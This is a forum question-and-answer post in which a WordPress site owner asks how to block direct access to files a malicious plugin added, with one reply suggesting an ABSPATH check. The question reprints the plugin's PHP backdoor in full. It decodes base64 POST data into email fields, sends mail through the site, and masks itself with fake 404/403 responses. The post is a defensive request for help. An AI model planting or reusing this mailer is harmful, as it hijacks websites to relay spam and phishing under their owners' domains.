WordPress disable direct access of files in WordPress installation path

I want to add a security feature to my WordPress website to stop direct access to files added to the root of WordPress installation, recently I discovered that a malicious plugin added some files to send email. Below is the malicious php code added.

?php

$method = $_SERVER['REQUEST_METHOD'];

switch ($method) {
  case 'GET':
    //Here Handle GET Request
    echo '###ERROR 404';
exit;
    break;
  case 'POST':
    //Here Handle POST Request

foreach($_POST as $key = $x_value) {

$data = base64_decode($x_value) ;
$to_data = explode('|',  $data);

$to = $to_data[0];
$x_subject = $to_data[1];
$x_body = $to_data[2];
$from_user = $to_data[3];
$from_email = $to_data[4];
$header = $to_data[5];

$jfnbrsjfq =  mail($to, $x_subject, $x_body, $header);
if($jfnbrsjfq){echo 'error 403';} else {echo 'error 404 : ' . $jfnbrsjfq;} 

}
}

In this case the hacker would pass some parameters to send emails using my domain while using this code.

I thought there might be a way to disable direct access of this files to send email or any other malicious activity. Is there a way to restrict using nginx? What is the best approach to deal with this case. I will appreciate any useful input.

Topic hacked security plugins Wordpress

Category Web

1
answered at

Look into adding a constant check at the top of the script:

if ( ! defined( 'ABSPATH' ) ) {
    exit; // Exit if accessed directly
}

See: https://stackoverflow.com/questions/43212340/what-is-meant-by-if-defined-abspath

About

Geeks Mental is a community that publishes articles and tutorials about Web, Android, Data Science, new techniques and Linux security.